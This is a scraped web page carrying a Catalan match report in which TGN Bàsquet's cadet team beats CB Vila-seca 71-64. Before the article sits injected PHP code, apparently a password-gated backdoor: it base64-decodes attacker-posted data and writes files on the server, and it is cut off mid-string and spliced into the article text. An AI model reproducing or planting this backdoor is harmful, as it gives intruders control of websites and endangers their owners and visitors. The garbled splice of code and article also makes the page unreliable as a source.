function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Cadet masculí 05 A treu partit de la seva bona primera meitat i guanya el CB Vila-seca (71-64) - Tgn Bàsquet Club -

El Cadet masculí 05 A treu partit de la seva bona primera meitat i guanya el CB Vila-seca (71-64)

Updated: març 30, 2021

El Cadet masculí 05 A del TGN Bàsquet va derrotar el CB Vila-seca després de fer una bona primera meitat de partit. El conjunt que entrena Raül Bonet va desplegar un gran joc ofensiu (45 punts a la mitja part) que es va combinar amb una defensa a tota la pista excel·lent. El joc col·lectiu dels liles els van permetre liderar el marcador al descans amb un resultat de 45-36, però aquesta superioritat va ser inferior en la segona meitat.

El TGN Bàsquet va notar negativament el desgast físic dels dos primers quarts i no va poder mantenir l’alt ritme de joc que havia exhibit durant els primers 20 minuts. Els visitants ho van aprofitar per acostar-se als locals que, però, van saber mantenir l’avantatge i sumar un triomf important.